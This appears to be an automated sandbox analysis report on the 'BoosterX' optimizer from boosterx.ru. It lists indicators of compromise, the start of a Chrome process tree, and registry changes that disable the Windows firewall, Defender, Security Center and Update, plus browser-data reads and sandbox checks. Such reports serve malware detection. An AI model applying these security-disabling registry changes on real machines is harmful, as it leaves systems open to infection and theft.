Analysis
-
max time kernel
279s -
max time network
1025s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
21-05-2022 15:06
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://boosterx.ru
Resource
win10v2004-20220414-en
General
-
Target
https://boosterx.ru
Malware Config
Signatures
-
Modifies firewall policy service 2 TTPs 4 IoCs
Processes:
reg.exereg.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\EnableFirewall = "0" reg.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" reg.exe -
Modifies security service 2 TTPs 7 IoCs
Processes:
reg.exereg.execmd.exereg.exereg.exereg.exereg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4" cmd.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4" reg.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
Processes:
svchost.exedescription pid process target process PID 1108 created 2148 1108 svchost.exe BoosterX_v1.20.exe PID 1108 created 2148 1108 svchost.exe BoosterX_v1.20.exe PID 1108 created 2148 1108 svchost.exe BoosterX_v1.20.exe PID 1108 created 2148 1108 svchost.exe BoosterX_v1.20.exe PID 1108 created 2148 1108 svchost.exe BoosterX_v1.20.exe PID 1108 created 2116 1108 svchost.exe BoosterX_v1.20.exe PID 1108 created 2428 1108 svchost.exe Conhost.exe PID 1108 created 4648 1108 svchost.exe BoosterX_v1.20.exe PID 1108 created 4768 1108 svchost.exe BoosterX_v1.20.exe PID 1108 created 3764 1108 svchost.exe BoosterX_v1.20.exe -
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 692 bcdedit.exe 4632 bcdedit.exe -
Modifies Installed Components in the registry 2 TTPs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
explorer.exedescription ioc process File opened (read-only) \??\D: explorer.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 163 ipapi.co -
Drops file in System32 directory 1 IoCs
Processes:
BoosterX_v1.20.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\BoosterX_v1.20.exe.log BoosterX_v1.20.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 13 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
BoosterX_v1.20.exetaskmgr.exedescription ioc process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags BoosterX_v1.20.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 BoosterX_v1.20.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc BoosterX_v1.20.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID BoosterX_v1.20.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags BoosterX_v1.20.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 BoosterX_v1.20.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID BoosterX_v1.20.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName BoosterX_v1.20.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\DeviceDesc BoosterX_v1.20.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName BoosterX_v1.20.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
taskmgr.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 taskmgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString taskmgr.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
chrome.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe -
Kills process with taskkill 3 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exepid process 3180 taskkill.exe 3432 taskkill.exe 2464 taskkill.exe -
Modifies data under HKEY_USERS 25 IoCs
Processes:
BoosterX_v1.20.exeBoosterX_v1.20.exereg.execmd.exereg.exedescription ioc process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" BoosterX_v1.20.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" BoosterX_v1.20.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" cmd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" cmd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" BoosterX_v1.20.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" BoosterX_v1.20.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" BoosterX_v1.20.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ cmd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" BoosterX_v1.20.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" BoosterX_v1.20.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" cmd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ BoosterX_v1.20.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" BoosterX_v1.20.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ BoosterX_v1.20.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" cmd.exe -
Modifies registry class 21 IoCs
Processes:
reg.exereg.exereg.exeexplorer.exereg.exechrome.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.pow reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.pow\FriendlyTypeName = "Power Plan" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.pow\shell\Import reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1809750270-3141839489-3074374771-1000\{E50D0B86-5C91-40A0-9038-568ABD0E75D1} explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.pow reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.pow\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.pow\DefaultIcon\ = "%C:\\Windows%\\System32\\powercfg.cpl,-202" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.pow\shell\Import\command\ = "powercfg /import \"%1\"" reg.exe Key created \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ explorer.exe Key created \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\Local Settings chrome.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.pow\shell reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ explorer.exe Key created \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.pow\ = "Power Plan" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.pow\shell\Import\command reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.pow reg.exe Key created \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell explorer.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
chrome.exechrome.exechrome.exechrome.exechrome.exeBoosterX_v1.20.exechrome.exechrome.exeBoosterX_v1.20.exeConhost.exeBoosterX_v1.20.exeBoosterX_v1.20.exeBoosterX_v1.20.exechrome.exetaskmgr.exechrome.exepid process 1816 chrome.exe 1816 chrome.exe 1732 chrome.exe 1732 chrome.exe 1784 chrome.exe 1784 chrome.exe 4728 chrome.exe 4728 chrome.exe 3088 chrome.exe 3088 chrome.exe 2148 BoosterX_v1.20.exe 2148 BoosterX_v1.20.exe 2720 chrome.exe 2720 chrome.exe 800 chrome.exe 800 chrome.exe 2148 BoosterX_v1.20.exe 2148 BoosterX_v1.20.exe 2148 BoosterX_v1.20.exe 2148 BoosterX_v1.20.exe 2148 BoosterX_v1.20.exe 2116 BoosterX_v1.20.exe 2116 BoosterX_v1.20.exe 2428 Conhost.exe 2428 Conhost.exe 4648 BoosterX_v1.20.exe 4648 BoosterX_v1.20.exe 4768 BoosterX_v1.20.exe 4768 BoosterX_v1.20.exe 3764 BoosterX_v1.20.exe 3764 BoosterX_v1.20.exe 4728 chrome.exe 4728 chrome.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 2340 chrome.exe 2340 chrome.exe 2340 chrome.exe 2340 chrome.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes:
BoosterX_v1.20.exetaskmgr.exepid process 2148 BoosterX_v1.20.exe 960 taskmgr.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
Processes:
chrome.exepid process 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
BoosterX_v1.20.exesvchost.exeBoosterX_v1.20.exeBoosterX_v1.20.exeBoosterX_v1.20.exeBoosterX_v1.20.exeBoosterX_v1.20.exeConhost.exeBoosterX_v1.20.exeBoosterX_v1.20.exeBoosterX_v1.20.exereg.execmd.exetaskkill.exetaskkill.exetaskmgr.exepowercfg.exepowercfg.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exetaskkill.exeexplorer.exedescription pid process Token: SeDebugPrivilege 2148 BoosterX_v1.20.exe Token: SeDebugPrivilege 2148 BoosterX_v1.20.exe Token: SeTcbPrivilege 1108 svchost.exe Token: SeTcbPrivilege 1108 svchost.exe Token: SeDebugPrivilege 2148 BoosterX_v1.20.exe Token: SeDebugPrivilege 2148 BoosterX_v1.20.exe Token: SeDebugPrivilege 2148 BoosterX_v1.20.exe Token: SeDebugPrivilege 2148 BoosterX_v1.20.exe Token: SeDebugPrivilege 2428 BoosterX_v1.20.exe Token: SeDebugPrivilege 2116 BoosterX_v1.20.exe Token: SeDebugPrivilege 4768 BoosterX_v1.20.exe Token: SeDebugPrivilege 4648 BoosterX_v1.20.exe Token: SeDebugPrivilege 3764 BoosterX_v1.20.exe Token: SeDebugPrivilege 2116 BoosterX_v1.20.exe Token: SeDebugPrivilege 2428 Conhost.exe Token: SeDebugPrivilege 4648 BoosterX_v1.20.exe Token: SeDebugPrivilege 4768 BoosterX_v1.20.exe Token: SeDebugPrivilege 3764 BoosterX_v1.20.exe Token: SeDebugPrivilege 5024 BoosterX_v1.20.exe Token: SeDebugPrivilege 1888 BoosterX_v1.20.exe Token: SeDebugPrivilege 2260 BoosterX_v1.20.exe Token: SeDebugPrivilege 5112 reg.exe Token: SeDebugPrivilege 432 cmd.exe Token: SeDebugPrivilege 3180 taskkill.exe Token: SeLoadDriverPrivilege 2148 BoosterX_v1.20.exe Token: SeDebugPrivilege 3432 taskkill.exe Token: SeDebugPrivilege 960 taskmgr.exe Token: SeSystemProfilePrivilege 960 taskmgr.exe Token: SeCreateGlobalPrivilege 960 taskmgr.exe Token: SeShutdownPrivilege 2236 powercfg.exe Token: SeCreatePagefilePrivilege 2236 powercfg.exe Token: SeShutdownPrivilege 3376 powercfg.exe Token: SeCreatePagefilePrivilege 3376 powercfg.exe Token: SeDebugPrivilege 2228 powershell.exe Token: SeDebugPrivilege 1944 powershell.exe Token: SeDebugPrivilege 4196 powershell.exe Token: SeDebugPrivilege 1400 powershell.exe Token: SeDebugPrivilege 4736 powershell.exe Token: SeDebugPrivilege 2240 powershell.exe Token: SeDebugPrivilege 4468 powershell.exe Token: SeDebugPrivilege 2168 powershell.exe Token: SeDebugPrivilege 3104 powershell.exe Token: SeDebugPrivilege 4580 powershell.exe Token: SeDebugPrivilege 4824 powershell.exe Token: SeDebugPrivilege 4488 powershell.exe Token: SeDebugPrivilege 2396 powershell.exe Token: SeDebugPrivilege 4800 powershell.exe Token: SeDebugPrivilege 3984 powershell.exe Token: SeDebugPrivilege 3840 powershell.exe Token: SeLoadDriverPrivilege 2148 BoosterX_v1.20.exe Token: SeLoadDriverPrivilege 2148 BoosterX_v1.20.exe Token: SeLoadDriverPrivilege 2148 BoosterX_v1.20.exe Token: SeLoadDriverPrivilege 2148 BoosterX_v1.20.exe Token: SeLoadDriverPrivilege 2148 BoosterX_v1.20.exe Token: SeLoadDriverPrivilege 2148 BoosterX_v1.20.exe Token: SeLoadDriverPrivilege 2148 BoosterX_v1.20.exe Token: SeLoadDriverPrivilege 2148 BoosterX_v1.20.exe Token: SeDebugPrivilege 2464 taskkill.exe Token: SeShutdownPrivilege 2376 explorer.exe Token: SeCreatePagefilePrivilege 2376 explorer.exe Token: SeShutdownPrivilege 2376 explorer.exe Token: SeCreatePagefilePrivilege 2376 explorer.exe Token: SeShutdownPrivilege 2376 explorer.exe Token: SeCreatePagefilePrivilege 2376 explorer.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
chrome.exeBoosterX_v1.20.exetaskmgr.exepid process 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 2148 BoosterX_v1.20.exe 2148 BoosterX_v1.20.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
chrome.exetaskmgr.exepid process 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe 960 taskmgr.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
chrome.exedescription pid process target process PID 1732 wrote to memory of 776 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 776 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1660 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1660 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1660 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1660 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1660 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1660 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1660 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1660 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1660 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1660 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1660 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1660 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1660 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1660 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1660 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1660 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1660 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1660 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1660 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1660 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1660 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1660 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1660 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1660 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1660 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1660 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1660 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1660 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1660 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1660 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1660 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1660 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1660 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1660 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1660 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1660 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1660 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1660 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1660 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1660 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1816 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1816 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1488 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1488 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1488 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1488 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1488 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1488 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1488 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1488 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1488 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1488 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1488 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1488 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1488 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1488 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1488 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1488 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1488 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1488 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1488 1732 chrome.exe chrome.exe PID 1732 wrote to memory of 1488 1732 chrome.exe chrome.exe
Processes
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" https://boosterx.ru1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffabeac4f50,0x7ffabeac4f60,0x7ffabeac4f702⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1664 /prefetch:22⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1624,5022130498618956401,15314799451151730312,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2016 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
